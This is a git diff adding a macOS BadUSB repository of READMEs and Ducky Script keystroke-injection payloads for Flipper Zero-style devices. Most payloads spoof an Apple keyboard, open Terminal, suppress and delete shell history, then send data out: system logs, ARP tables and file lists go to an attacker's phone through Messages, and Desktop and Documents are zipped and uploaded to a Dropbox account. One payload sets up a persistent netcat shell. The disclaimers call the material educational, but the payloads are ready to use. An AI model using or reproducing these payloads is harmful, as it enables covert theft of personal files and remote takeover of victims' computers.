diff --git a/BadUSB/MacOS-narstybits/Executions Readme.md b/BadUSB/MacOS-narstybits/Executions Readme.md new file mode 100644 index 00000000..d558a753 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions Readme.md @@ -0,0 +1,88 @@ + + +
+ + + + + + + + + + + + +Welcome to the Executions Folder!
+ +These are just a few examples of tools used for executing security tests. Remember to always use these tools responsibly and in accordance with applicable laws and regulations.
+🔹FFmpeg: A powerful multimedia framework for encoding, decoding, transcoding, and streaming audio and video files. +
🔹VNC (Virtual Network Computing): A remote desktop software that allows you to control and access remote systems over a network. +
🔹socat: A versatile network utility that establishes bidirectional data streams between two endpoints, facilitating various network operations. +
🔹Nikto: A web server scanner that performs comprehensive vulnerability assessments. +
🔹Gobuster: A tool used for directory and DNS busting during reconnaissance. +
🔹Nmap: A powerful network scanning tool used for port scanning and network mapping. +
🔹Duck Toolkit: A more comprehensive guide on using Hak5's Rubber Ducky, including how to write and decode Ducky Scripts.
+🔹Guru99's Load Testing Tutorial: An extensive tutorial that covers the principles and practical aspects of load testing, an essential part of assessing the performance and stability of a system under a particular load.
+🔹Dropbox API Keys Documentation: Comprehensive developer documentation from Dropbox, including detailed instructions on how to generate and manage API keys for application development.
+Welcome to the GOODUSB folder of Narsty's Ducky Script repository!
+ +This folder contains Ducky Scripts that focus on providing utility and helpful functionality to your system.
+ +gtop: A system monitoring dashboard for the terminal. +
htop: An interactive process viewer and system monitor. +
vtop: A graphical activity monitor for the terminal. +
Homebrew: a popular package manager for macOS that allows users to install, update, and manage various software packages and dependencies on their Mac computers. +
👻 Fragmentation: Fragmenting network packets into smaller pieces to bypass network filters and intrusion detection systems. + +
👻 TCP Packet Timing Randomization: Introducing random delays between sending TCP packets to obfuscate packet timing and add an element of randomness to network traffic. + +
👻 Network Padding: Adding additional data or padding to network packets to increase packet size and obfuscate the payload. +
👻 Proxies: Utilizing proxy servers to route network traffic through intermediaries, enhancing privacy and bypassing network restrictions. +
+ +
🔹Also note that running these obfuscation scripts may have different effects depending on your network environment, and it should be used responsibly and within legal boundaries. Additionally, ensure that you have the necessary permissions and authorizations to perform obscurity network testing techniques on your own network. + + +
When working with the scripts, make sure to carefully read the REM (remark) lines. REMs explain the purpose of each line or provide instructions to the user. It's crucial to always read and understand the REMs!
+ +'ID 05ac:021e Apple:Keyboard'
+ This code helps the operating system identify the specific device (in this case, the Flipper Zero) and load the appropriate drivers or configurations, such as for an Apple keyboard.
+ +'echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash'
+ This code enables the 'ignorespace' option for the command history, preventing commands with a leading space from being stored in the shell history. Special thanks to FalsePhilosopher + for helping create this string!
+ +history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
+ This code removes the specific command from the history, ensuring minimal traces are left behind and helping maintain discretion and privacy.
++ +⚠️ IMPORTANT DISCLAIMER ⚠️ ++ diff --git a/BadUSB/MacOS-narstybits/RECON Readme.md b/BadUSB/MacOS-narstybits/RECON Readme.md new file mode 100644 index 00000000..e3c7cae3 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON Readme.md @@ -0,0 +1,79 @@ + + + + + + + + + + + + + + + + + [![Image Description](https://imgur.com/MuZDdAV.png)](https://github.com/narstybits/MacOS-DuckyScripts/tree/main/RECON) + ++
❗️ Please exercise caution and responsibility when using the scripts and tools in the "executions," "obscurity," "pranks," "GOODUSB," and "Recon" folders. These scripts are intended for educational and ethical purposes such as penetration testing, security testing, and network testing. However, it is important to note that unauthorized or malicious use of these tools can be illegal and may lead to severe consequences. + +
+❗️ It is your responsibility to ensure that you have appropriate authorization, permissions, and legal rights to perform any security testing activities on computer systems or networks. Always respect the law, adhere to ethical guidelines, and obtain proper consent before conducting any tests or assessments. +
+ ++❗️ Remember, it is crucial to prioritize legal and ethical practices, protect user privacy, and use these tools responsibly to improve security and protect against real-world threats. +
+ ++ ++
Welcome to the Recon Folder!
+ +The Recon Folder is dedicated to the topic of Reconnaissance in cybersecurity. It provides information, resources, and tools related to various aspects of Reconnaissance. + + + Introduction +
+ ++Reconnaissance is the process of gathering information and intelligence about a target, typically used in cybersecurity to assess vulnerabilities and plan targeted attacks. This repository aims to educate and provide resources about the different aspects of Reconnaissance. + +
Types of Reconnaissance +
+ +++
+ ++
+🔹 Passive Reconnaissance: This involves gathering information without directly interacting with the target. It includes techniques like open-source intelligence (OSINT) gathering, analyzing publicly available information, and searching for vulnerabilities. +
🔹 Active Reconnaissance: In this phase, an attacker engages with the target system to gather information actively. It may include techniques like port scanning, vulnerability scanning, and network mapping. +
🔹 Social Engineering: Reconnaissance can also involve social engineering techniques to gather information from individuals or organizations. This includes methods like phishing, pretexting, and impersonation. +
Tools +
+ +++
+ ++
+🔹Nmap: A powerful network scanning tool used for port scanning and network mapping. +
🔹Wireshark: A network protocol analyzer for capturing and analyzing network traffic. +
🔹Nikto: A web server scanner that performs comprehensive vulnerability assessments. +
🔹Gobuster: A tool used for directory and DNS busting during reconnaissance. +
These are just a few examples of tools used in reconnaissance. Remember to always use these tools responsibly and legally, respecting the privacy and security of others.
+ +Resources +
+ ++Here are some additional resources to learn more about Reconnaissance:
+ ++
+ ++
+🔹The Web Application Hacker's Handbook by Dafydd Stuttard and Marcus Pinto +
🔹OSINT Framework: A collection of various tools and resources for OSINT. +
🔹OWASP Top Ten Project: A list of the top ten most critical web application security risks +
+ ++ diff --git a/BadUSB/MacOS-narstybits/RECON/ macOS System Log to iPhone.txt b/BadUSB/MacOS-narstybits/RECON/ macOS System Log to iPhone.txt new file mode 100644 index 00000000..d1336b45 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/ macOS System Log to iPhone.txt @@ -0,0 +1,36 @@ +REM This script retrieves the contents of the system log located at /var/log/system.log +REM Then sends the Users System logs to your phone via text message +REM Replace 'ENTER PHONE NUMBER HERE' with your actual Phone number +REM Shoutout to matthewkayne and 0iphor13 for the Phone code + + +REM Title: macOS System Log to iPhone +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +ENTER +DELAY 500 +STRING x=$(cat /var/log/system.log); osascript -e 'tell application "Messages" to send "'$x'" to buddy "ENTER PHONE NUMBER HERE"' +DELAY 500 +ENTER +DELAY 5000 +GUI k +DELAY 250 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Arp table to Iphone.txt b/BadUSB/MacOS-narstybits/RECON/Arp table to Iphone.txt new file mode 100644 index 00000000..cfa2b941 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Arp table to Iphone.txt @@ -0,0 +1,39 @@ +REM This script uses the "x=$(arp -a)" command to retrieve ARP table information. +REM Then it sends the information to your iPhone. + + +REM Shoutout to matthewkayne and 0iphor13 for the Phone code part. +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information + + +REM Title: Arp table to Iphone +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(arp -a); osascript -e 'tell application "Messages" to send "'"$x"'" to buddy "Phone Number HERE"' +DELAY 1000 +ENTER +DELAY 5000 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Copy All JPEG Images.txt b/BadUSB/MacOS-narstybits/RECON/Copy All JPEG Images.txt new file mode 100644 index 00000000..8852c005 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Copy All JPEG Images.txt @@ -0,0 +1,22 @@ +REM This script opens the terminal. +REM It searches for all JPEG image files located on the entire hard drive. +REM It copies the found JPEG images to a folder named "Images" in the destination of your choice. + +REM Author: Narsty +REM Title: Copy All JPEG Images +REM Target: MacOS +REM Version: 1.0 +REM Category: + + +ID 05ac:021e Apple:Keyboard +DELAY 300 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING find / -type f -iname "*.jpeg" -exec cp {} ~/Insert Destination here /Images/ \; +DELAY 2000 +ENTER diff --git a/BadUSB/MacOS-narstybits/RECON/Desktop Data to Dropbox.txt b/BadUSB/MacOS-narstybits/RECON/Desktop Data to Dropbox.txt new file mode 100644 index 00000000..ea8a7ece --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Desktop Data to Dropbox.txt @@ -0,0 +1,66 @@ +REM This script copies the contents of the Desktop and uploads it to a specific dropbox API +REM Just replace "" with your actual API access token. line 26 +REM Once the desktop contents .zip is uploaded to your dropbox +REM The Backup folder containing the .zip will be deleted and the terminal will be cleared and closed. + +REM Author: Narsty +REM Title: Desktop Data to Dropbox +REM Version 2.0 MacOs +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING mkdir -p ~/Desktop/Backup +ENTER +DELAY 500 +STRING cp -R ~/Desktop/* ~/Desktop/Backup/ +ENTER +DELAY 500 +STRING echo 'cd ~/Desktop/Backup && zip -r backup.zip . && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip' > upload.sh +ENTER +DELAY 2500 +ENTER +STRING chmod +x upload.sh +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +ENTER +DELAY 2000 +CTRL C +DELAY 500 +STRING rm ~/Desktop/Backup +DELAY 2000 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 5000 +STRING rm backup.zip +DELAY 2000 +ENTER +DELAY 500 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI w +DELAY 1000 +ENTER +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/RECON/Desktop file list to iPhone.txt b/BadUSB/MacOS-narstybits/RECON/Desktop file list to iPhone.txt new file mode 100644 index 00000000..42caaa71 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Desktop file list to iPhone.txt @@ -0,0 +1,37 @@ +REM This script gets a list of the files on the Desktop, +REM then it sends the list to your iphone. +REM Shoutout to matthewkayne and 0iphor13 for the Phone code part. + +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information + +REM Title: Desktop file list to iPhone +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +ENTER +DELAY 500 +STRING x=$(ls /Users/*/Desktop); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +GUI h diff --git a/BadUSB/MacOS-narstybits/RECON/Document to Dropbox API.txt b/BadUSB/MacOS-narstybits/RECON/Document to Dropbox API.txt new file mode 100644 index 00000000..144f6ea4 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Document to Dropbox API.txt @@ -0,0 +1,53 @@ +REM This script Creates a folder in the tmp directory +REM copies the contents of the Documents into the tmp folder zips it +REM zips it and uploads it to a specific dropbox API + +REM Replace " " with your actual API access token. + +REM Title: Document to Dropbox API +REM Author: Narsty +REM Version 1.0 MacOs +REM Category: Recon + + +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING mkdir -p /tmp/Backup/Documents +ENTER +DELAY 500 +STRING cp -R ~/Documents/. /tmp/Backup/Documents +ENTER +DELAY 500 +STRING cd /tmp/Backup && zip -r backup.zip Documents +ENTER +DELAY 500 +STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip +DELAY 1000 +ENTER +DELAY 10000 +STRING rm /tmp/Backup/backup.zip +ENTER +DELAY 500 +STRING rm -r /tmp/Backup/Documents +ENTER +DELAY 500 +STRING clear +DELAY 250 +ENTER +DELAY 500 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Documents file list to iPhone.txt b/BadUSB/MacOS-narstybits/RECON/Documents file list to iPhone.txt new file mode 100644 index 00000000..4fe1c745 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Documents file list to iPhone.txt @@ -0,0 +1,45 @@ +REM This script gets a list of the files in the documents folder, +REM then it sends the list to your iphone. +REM Shoutout to matthewkayne and 0iphor13 for the Phone code part. + +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information +REM Replace "SYSTEM USERNAME HERE" with your phone number to receive MacOs System information + +REM Title: Documents file list to iPhone +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(ls /Users/SYSTEM USERNAME HERE/Documents); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +GUI W + + + + + + diff --git a/BadUSB/MacOS-narstybits/RECON/Dropbox File Downloader.txt b/BadUSB/MacOS-narstybits/RECON/Dropbox File Downloader.txt new file mode 100644 index 00000000..c4b34425 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Dropbox File Downloader.txt @@ -0,0 +1,36 @@ +REM Replace with the actual URL for the file you want to download. +REM Additionally, replace filename with the desired name and extension for the downloaded file. +REM the script will download a file to the target MacOs desktop + + + +REM Author: Narsty +REM Title: Dropbox File Downloader +REM Version 1.0 MacOs +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING nohup curl -L -o ~/Desktop/ " " & +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/GuardianForge.txt b/BadUSB/MacOS-narstybits/RECON/GuardianForge.txt new file mode 100644 index 00000000..2eb7b4ca --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/GuardianForge.txt @@ -0,0 +1,39 @@ +REM Script for System Execution Testing +REM This script is designed to test system execution capabilities and security settings on macOS. +REM It performs a series of controlled executions to assess the system's behavior and identify any vulnerabilities. + +REM You can replace with th path of your flipper to save the data dump + + + + +REM Author: Narsty +REM Title: GuardianForge +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING csrutil status > ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING spctl --status >> ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING codesign -dv --verbose=4 /bin/bash >> ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING ps aux | grep -v "root\|_" >> ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING lsof -i >> ~/Desktop/security_info.txt && sleep 2 +ENTER + diff --git a/BadUSB/MacOS-narstybits/RECON/Infinite Reverse Shell.txt b/BadUSB/MacOS-narstybits/RECON/Infinite Reverse Shell.txt new file mode 100644 index 00000000..dbda022f --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Infinite Reverse Shell.txt @@ -0,0 +1,53 @@ +REM This script installs netcat using home-brew (can adjust delay) +REM Sets up a continuous loop using netcat to establish a connection +REM and execute a bash shell every 180 seconds. + + +REM Now on your separate computer in your terminal Run the command 'nc 53000' +REM replace ' ' with the IP address of the target computer. +REM I've noticed that NC does not respond if you copy and paste so please type the I.P. out! +REM If the connection is successful, you should now have a remote shell session on the remote computer. + +REM To kill the listening port (53000 in this case) use the command below +REM killall nc + + +REM Requirements: install netcat on both the remote target and your computer 'brew install netcat' +REM Requirements: Remote computer's IP address or hostname + +REM Title: Infinite Reverse Shell.txt +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING brew install netcat +DELAY 500 +ENTER +DELAY 20000 +STRING nohup bash -c 'while true; do nc -l -p 53000 -vvv -e /bin/bash; sleep 180; done' & +DELAY 500 +ENTER +DELAY 500 +CTRL d +DELAY 500 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Info Infiltrator to Iphone.txt b/BadUSB/MacOS-narstybits/RECON/Info Infiltrator to Iphone.txt new file mode 100644 index 00000000..5e78507a --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Info Infiltrator to Iphone.txt @@ -0,0 +1,42 @@ +REM This script does a Port scan using the targets I.P. +REM then it sends the information from the scan to your phone. +REM Shoutout to matthewkayne and 0iphor13 for the Phone code + +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information + +REM Title: InfoInfiltrator +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(system_profiler SPHardwareDataType SPSoftwareDataType); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI W diff --git a/BadUSB/MacOS-narstybits/RECON/Network Recon Plus.txt b/BadUSB/MacOS-narstybits/RECON/Network Recon Plus.txt new file mode 100644 index 00000000..c1e1b9e4 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Network Recon Plus.txt @@ -0,0 +1,29 @@ +REM 'networksetup -listallhardwareports' This command lists all the hardware ports/interfaces on your Mac, such as Wi-Fi, Ethernet, Bluetooth, etc. +REM 'ifconfig' This command displays the network interface configuration and status information. +REM ;arp -a' This command shows the Address Resolution Protocol (ARP) cache table. +REM It displays the mappings between IP addresses and MAC addresses of devices on your local network. + +REM Title: Network Recon + +REM Author: Narsty +REM Version: 1.0 +REM Target: MacOs +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING networksetup -listallhardwareports +ENTER +DELAY 1000 +STRING ifconfig +ENTER +DELAY 1000 +STRING arp -a +ENTER + + diff --git a/BadUSB/MacOS-narstybits/RECON/Network Recon to Dropbox.txt b/BadUSB/MacOS-narstybits/RECON/Network Recon to Dropbox.txt new file mode 100644 index 00000000..6ab75128 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Network Recon to Dropbox.txt @@ -0,0 +1,49 @@ +REM Network Recon and Cloud Sync Automation +REM This script gathers network information from a macOS system +REM then uploads it to Dropbox for easy synchronization and analysis. +REM Replace " " with your actual API access token. line 25 + +REM Title: Network Recon to Dropbox +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING osascript -e 'do shell script "networksetup -listallhardwareports > \"$HOME/Desktop/network_interfaces.txt\" && ipconfig getpacket en0 >> \"$HOME/Desktop/network_interfaces.txt\""' +DELAY 1000 +ENTER +DELAY 500 +STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/network_interfaces.txt\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @"$HOME/Desktop/network_interfaces.txt" +DELAY 2000 +ENTER +DELAY 5000 +STRING rm -r ~/Desktop/network_interfaces.txt +DELAY 500 +ENTER +STRING clear +DELAY 500 +ENTER +GUI w +DELAY 500 +ENTER + + diff --git a/BadUSB/MacOS-narstybits/RECON/Network Reconnaissance.txt b/BadUSB/MacOS-narstybits/RECON/Network Reconnaissance.txt new file mode 100644 index 00000000..0d71a65d --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Network Reconnaissance.txt @@ -0,0 +1,46 @@ +REM Use responsibly and with proper permissions. + +REM This script initiates a network reconnaissance by scanning for live hosts, +REM performing a port scan on live hosts, + + +REM Author: Narsty +REM Title: Network Reconnaissance +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +REM Replace (15.151.298.31) with your targets I.P. address + +REM can insert multiple I.p.'s if needed + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING echo "Network Reconnaissance:" +STRING && echo "------------------------------" +STRING && echo "Scan Date: $(date)" +STRING && echo "------------------------------" +STRING && echo "Scanning for Live Hosts..." +STRING && echo "------------------------------" +STRING && ping -c 3 15.151.298.31 +STRING && ping -c 3 15.151.298.31 +REM Add more IP addresses to ping as needed +STRING && echo "------------------------------" +STRING && echo "Performing ARP Scan..." +STRING && echo "------------------------------" +STRING && arp -a +ENTER + + + + + + + diff --git a/BadUSB/MacOS-narstybits/RECON/Nmap Scan to Iphone.txt b/BadUSB/MacOS-narstybits/RECON/Nmap Scan to Iphone.txt new file mode 100644 index 00000000..3026b929 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Nmap Scan to Iphone.txt @@ -0,0 +1,42 @@ +REM This script does a Port scan using the targets I.P. +REM then it sends the information from the scan to your phone. +REM Shoutout to matthewkayne and 0iphor13 for the Phone code + +REM Replace "TARGET_IP" with I.P. of Target Mac +REM Replace "Phone Number HERE" with your phone number to receive Network Information + +REM Requirement: NMAP +REM can install using homebrew 'brew install nmap' + +REM Title: Nmap Scan to Iphone +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(nmap -p 1-1000 -T4 -v TARGET_IP); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +GUI W diff --git a/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder to Dropbox.txt b/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder to Dropbox.txt new file mode 100644 index 00000000..089a5a06 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder to Dropbox.txt @@ -0,0 +1,68 @@ +REM Description: Uses Mac Terminals config.me command to do a PUBLIC I.P. lookup +REM Saves the data to a folder on the desktop +REM Then proceeds to upload the I.P. data to your API dropbox +REM removes the folder on the desktop and closes the terminal +REM Replace with your actual Dropbox API access token + + + +REM Title: Public I.P. Finder to Dropbox +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +STRING public_ip=$(curl -s ifconfig.me); +DELAY 500 +ENTER +DELAY 3000 +STRING mkdir ~/Desktop/"Public I.P. Data" && echo "Your TARGETS IP address is: $public_ip" > ~/Desktop/"Public I.P. Data"/public_ip.txt +DELAY 1000 +ENTER +DELAY 500 +STRING echo 'cd ~/Desktop/"Public I.P. Data" && zip -r backup.zip . && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip' > upload.sh +DELAY 2000 +ENTER +DELAY 500 +STRING chmod +x upload.sh +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +DELAY 500 +ENTER +DELAY 1000 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING rm -rf ~/Desktop/"Public I.P. Data" +DELAY 500 +ENTER +DELAY 500 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI w +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder.txt b/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder.txt new file mode 100644 index 00000000..29b6659c --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder.txt @@ -0,0 +1,29 @@ +REM Description: Uses Mac Terminals config.me command to do a PUBLIC I.P. lookup +REM displays the results in a pop up window +REM & Saves the data to a folder on the desktop +REM Folder is named "Public I.P. Data" + + +REM Title: Public I.P. Finder +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +STRING curl -s ifconfig.me; echo +DELAY 500 +ENTER +DELAY 500 +STRING public_ip=$(curl -s ifconfig.me); osascript -e "tell app \"System Events\" to display dialog \"I FOUND YOU: $public_ip\" with title \"Public IP Address\"" +DELAY 500 +STRING mkdir ~/Desktop/"Public I.P. Data" && echo "Your TARGETS IP address is: $public_ip" > ~/Desktop/"Public I.P. Data"/public_ip.txt +DELAY 500 +ENTER + diff --git a/BadUSB/MacOS-narstybits/RECON/Public I.P. to Iphone.txt b/BadUSB/MacOS-narstybits/RECON/Public I.P. to Iphone.txt new file mode 100644 index 00000000..b05b11c7 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Public I.P. to Iphone.txt @@ -0,0 +1,37 @@ +REM This script uses Mac Terminals ifconfig.me command to do a PUBLIC I.P. lookup +REM Then sends the I.p. to your phone via text message +REM Replace 'ENTER PHONE NUMBER HERE' with your actual 